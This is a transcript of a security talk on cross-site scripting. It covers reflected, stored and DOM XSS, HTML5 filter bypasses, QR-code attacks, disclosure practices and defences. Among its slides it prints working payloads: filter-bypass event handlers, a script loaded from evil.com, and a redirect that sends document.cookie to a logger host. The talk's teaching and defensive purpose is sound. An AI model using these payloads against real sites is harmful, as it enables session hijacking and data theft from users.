JavaScript Injections
DESCRIPTION
Web application security and JavaScript injection methods
TRANSCRIPT
![Page 1: Javascript Injections](https://reader034.vdocuments.mx/reader034/viewer/2022042613/546c4497af795962298b4f42/html5/thumbnails/1.jpg)
JavaScript Injections
● Information security researcher @SignalSec
● Pentester
● Software developer
● Open-source lover.
@evrnyalcin
www.signalsec.com/blog
Index
0x01 What is XSS?
0x02 Reflected, Stored, DOM XSS
0x03 HTML5 XSS
0x04 QR code XSS
0x05 Motivation
0x06 Protection methods
XSS (cross-site scripting)
● Cross-site scripting attack
● XSS is one of the most common web attacks (Top 10).
● It is carried out using HTML, CSS, JavaScript, XML, DOM, cookies, URIs and VBScript.
XSS attack types
● Reflected
● Stored
● DOM
Browser components
Reflected XSS
What changes?
URL:
Gonder.php?ad=justin&soyad=biber
Source code:
$_GET['ad']
$_GET['soyad']
Response
Merhaba $_GET['ad'] $_GET['soyad']
Reflected XSS
Gonder.php?ad=justin<attack vector goes here>&soyad=biber
● Attack vector: <script>alert(1);</script>
Alert!
Stored XSS
Stored XSS
Method: POST
Gonder.php?ad=justin&soyad=biber
Registered users:
Stored XSS
Gonder.php?ad=justin<attack vector goes here>&soyad=biber
● Attack vector: <script>alert(1);</script>
Alert!
What is the DOM?
● DOM (Document Object Model)
● The DOM lets us access the properties of any object on the page and change those properties.
DOM XSS
● A vulnerability that arises from tampering with DOM objects.
● DOM XSS is a client-side vulnerability.
● Inputs arrive through URL parameters, XMLHttpRequest, HTTP headers, etc.
● It is as dangerous as reflected and stored XSS.
DOM XSS sources & sinks
● Source: DOM properties that the attacker can influence
● Sink: places such as DOM properties and JavaScript functions that can execute client-side code.
Sources
● document.URL
● document.URLUnencoded
● document.location (.pathname | .href | .search | .hash)
● window.location (.pathname | .href | .search | .hash)
Sources
● document.cookie
● sessionStorage
● localStorage
● Web SQL Database
● IndexedDB
Sources
● window.name
● document.referrer
● history (HTML5)
Sinks
● innerHTML, outerHTML, document.write
● eval, execScript, Function, setTimeout, setInterval, script.src, iframe.src, location (replace | assign)
DOM-based
● www.ornek.com/#key=value
● www.ornek.com/#key=value<script src="http://www.evil.com"></script>
DOM XSS example
<script type="text/javascript">
// location.hash is the source; document.write is the sink that parses it as HTML
var param = location.hash.split("#")[1];
document.write("Merhaba " + param + "!");
</script>
DOM XSS example
● ornek.html#<script>alert(1)</script>
IE 6, 7, 8, 9
Chrome 15 (XSS Filter Block)
Firefox 3, 4, 5, 6, 7
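As an added example (not code from the slides), the hash greeting above rewritten so that the value taken from `location.hash` never reaches an HTML-parsing sink. The element is passed in so that the same functions run in a browser (a real element) and under Node (a plain object); the `#greeting` element id and the "misafir" (guest) fallback are assumptions of this example.

```javascript
// Added example, not from the slides: the hash greeting rewritten so that the
// value taken from location.hash never reaches an HTML-parsing sink.

// Read the fragment the way the slide does, without the leading "#".
function hashParam(hash) {
  return hash.startsWith("#") ? hash.slice(1) : hash;
}

// The slide's vulnerable shape, returned instead of passed to document.write
// so it can be inspected: the sink would parse the fragment as HTML.
function greetingMarkupUnsafe(hash) {
  return "Merhaba " + hashParam(hash) + "!";
}

// Hardened sink: textContent assigns text, so "<script>" is displayed
// literally and never becomes an element.
function greetSafely(el, hash) {
  el.textContent = "Merhaba " + hashParam(hash) + "!";
  return el.textContent;
}

// Stricter: when the parameter has a known shape (a username here), validate
// it against an allowlist and fall back to a neutral value when it fails.
const NAME_RE = /^[A-Za-z0-9_]{1,32}$/;
function greetValidated(el, hash) {
  let raw;
  try {
    raw = decodeURIComponent(hashParam(hash));
  } catch (e) {
    raw = ""; // malformed percent-encoding: treat as invalid
  }
  const name = NAME_RE.test(raw) ? raw : "misafir"; // "misafir" = guest (assumed fallback)
  el.textContent = "Merhaba " + name + "!";
  return el.textContent;
}

// In a browser, wire it to an element such as <span id="greeting"></span>.
if (typeof document !== "undefined" && document.getElementById("greeting")) {
  greetValidated(document.getElementById("greeting"), location.hash);
}
```

`textContent` removes the sink; the allowlist additionally removes the source's freedom, which is the stronger fix when the parameter has a known format.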
Is jQuery safe?
● JavaScript security = jQuery security
● jQuery = sink (bugs.jquery.com)
When banks use jQuery
Theory:
● DOM XSS vulnerability
● Top 10 banks: jQuery 1.3.2.min.js, jQuery 1.2.3, etc.
● In practice?
jQuery 1.6.1
Attack vector: http://ornek.com/#<img src=/ onerror=alert(1)>
HTML5
● HTML5 > HTML4
● New tags and attributes
● New APIs
● We will need plugins such as Flash, Silverlight and Java less.
● Client-side storage, drag-and-drop, web sockets
● Supported by Firefox, Chrome, Safari and Opera.
Bypass filters
● "I blocked tags like <script> and <img>!"
<video src=1 onerror=alert(1)>
<audio src=1 onerror=alert(1)>
=> http://html5sec.org/
Bypass filters
● "I blocked tags like <, >!"
<form id onforminput=alert(1)><input></form>
<button form=test onformchange=alert(2)>
Local storage
<script>
alert(localStorage.getItem('SessionID'));
</script>
QR code
● The QR code takes its name from the initials of "Quick Response".
● In recent years it has been used on billboards, on business cards, in mobile payments, etc.
● The barcode content can direct the user to a web address, an e-mail address, a phone number, contact details, SMS/MMS, or geolocation data.
The biggest attack vector :)
EvilQR
Mobile devices are a gold mine for hackers.
● Theft of personal information
● Theft of location data
● Remote activation of 3G, GPRS, Wi-Fi, Bluetooth, etc.
● Credit card details
● Defacing social accounts (Twitter, Facebook, etc.)
EvilQR
We set up two scenarios:
● Run JavaScript code.
● Redirect the user to malicious content.
EvilQR attack vectors
EvilQR analysis
Decode
QR reader test
Security recommendations
● Do not use QR codes from sources you do not know
● Make sure your QR reader has no security vulnerabilities
Motivation
Attack vector: <script>alert(document.location)</script>
Motivation
● XSS vulnerability
vuln.php?id=<script>document.location="http://example.com/logger.php?cookie="+document.cookie;</script>
● Track keystrokes with JavaScript (onkeypress event)
● Steal screenshots with html2canvas
Motivation
● Samy worm (MySpace): caused MySpace to go down
● Yahoo Yamanner worm: infected the web-mail system and sent spam.
● Orkut worm: said to have infected 300,000-600,000 people.
Motivation
● The Tumblr network currently hosts 65 million blogs and 27.6 billion posts
● Tumblr stored XSS
Attack vector:
tester"><img src='x' onerror="alert(document.cookie)" />
Motivation
www.xssed.com
Motivation
Dominator (DOM XSS scanner)
Motivation
XSS Challenge
Motivation
● CIfrex Security Research Tool
● Free
● PHP-based
● "Apache2 Undefined Charset UTF-7 XSS Vulnerability" and many more
● Cxsecurity.com
Motivation
Everything has a price :) Google, Microsoft, Facebook, Twitter, Adobe, eBay, PayPal, etc.
Disclosing the vulnerability
● Responsible disclosure:
1- Contact the vendor.
2- Share a POC (proof-of-concept code).
3- Reach an agreement.
4- Publish on a site such as exploit-db.com.
Disclosing the vulnerability - 2
● Limited disclosure:
1- Contact the vendor.
2- No POC or any other information is given.
Disclosing the vulnerability - 3
● No disclosure:
1- Deface
Protection
● Did you close your HTML tags?
● Did you try the characters ' " \ in user input?
● Did you try different content in URL links, attribute values, etc.?
● Did you pay attention to character encoding?
● Did you define a Content-Type for the response header?
Protection
● Are you using HttpOnly?
● What is the state of the Cache-Control header for users over HTTP?
● Are third-party JavaScripts being imported?
● Is the session cookie protected?
● Can users modify HTTP headers?
● Can users upload files?
● Can users upload images, etc.? If so, do you check the file content and whether it is on the same domain?
● Do you provide API access? If so, is it on the same domain, and is there a cross-domain restriction?
Conclusion?
● All user input is dangerous.
● The human factor
THANK YOU @evrnyalcin | @xsuperbug